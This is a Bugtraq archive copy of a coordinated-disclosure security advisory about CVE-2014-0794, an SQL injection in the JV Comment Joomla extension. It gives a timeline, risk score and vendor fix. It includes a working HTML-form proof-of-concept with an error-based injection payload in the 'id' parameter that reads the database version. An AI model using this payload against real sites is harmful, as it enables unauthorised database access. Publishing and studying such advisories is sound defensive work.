[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SQL Injection in JV Comment Joomla Extension
From: High-Tech Bridge Security Research <advisory () htbridge ! com>
Date: 2014-01-23 12:13:29
Message-ID: 20140123121329.4CFD62C5864E () htbridge ! ch
[Download RAW message or body]
Advisory ID: HTB23195
Product: JV Comment Joomla Extension
Vendor: joomlavi.com
Vulnerable Version(s): 3.0.2 and probably prior
Tested Version: 3.0.2
Advisory Publication: January 2, 2014 [without technical details]
Vendor Notification: January 2, 2014
Vendor Patch: January 14, 2014
Public Disclosure: January 23, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-0794
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( \
https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered SQL injection vulnerability in JV \
Comment Joomla Extension, which can be exploited to perform SQL Injection attacks.
1) SQL Injection in JV Comment Joomla Extension: CVE-2014-0794
The vulnerability exists due to insufficient validation of "id" HTTP POST parameter \
passed to "/index.php" script. A remote authenticated attacker can execute arbitrary \
SQL commands in application's database.
The following exploitation example displays version of MySQL database:
<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="option" value="com_jvcomment">
<input type="hidden" name="task" value="comment.like">
<input type="hidden" name="id" value="1 AND 1=(select min(@a:=1)from (select 1 \
union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))"> <input \
type="submit" id="btn"> </form>
-----------------------------------------------------------------------------------------------
Solution:
Update to JV Comment 3.0.3
More Information:
http://extensions.joomla.org/extensions/contacts-and-feedback/articles-comments/23394
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23195 - https://www.htbridge.com/advisory/HTB23195 - \
SQL Injection in JV Comment Joomla Extension. [2] JV Comment Joomla Extension - \
http://www.joomlavi.com/joomla-extensions/jv-comment.html - With JV Comment, adding a \
comment system to your articles is now as simple as installing a plug-in and \
adjusting a few parameters. [3] Common Vulnerabilities and Exposures (CVE) - \
http://cve.mitre.org/ - international in scope and free for public use, CVE ® is a \
dictionary of publicly known information security vulnerabilities and exposures. [4] \
Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and \
security practitioners, CWE is a formal list of software weakness types. [5] \
ImmuniWeb ® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary \
web application security assessment solution with SaaS delivery model that combines \
manual and automated vulnerability testing.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without \
any warranty of any kind. Details of this Advisory may be updated in order to provide \
as accurate information as possible. The latest version of the Advisory is available \
on web page [1] in the References.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic